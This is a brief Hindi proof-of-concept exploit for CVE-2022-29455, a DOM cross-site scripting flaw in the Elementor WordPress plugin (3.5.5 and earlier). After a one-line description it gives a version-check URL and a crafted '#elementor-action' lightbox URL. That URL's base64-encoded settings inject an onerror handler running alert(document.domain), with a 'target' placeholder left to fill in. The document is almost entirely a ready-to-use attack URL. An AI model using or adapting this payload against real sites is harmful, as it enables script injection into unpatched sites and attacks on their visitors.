
CVE-2022-29455 के लिए प्रमाण-अवधारणा शोषण, Elementor WordPress प्लगइन (<=3.5.5) में क्रॉस-साइट स्क्रिप्टिंग भेद्यता, क्राफ्टेड लाइटबॉक्स एक्शन URL के माध्यम से।
WordPress भेद्यता - XSS (क्रॉस-साइट स्क्रिप्टिंग)
https://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js
https://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=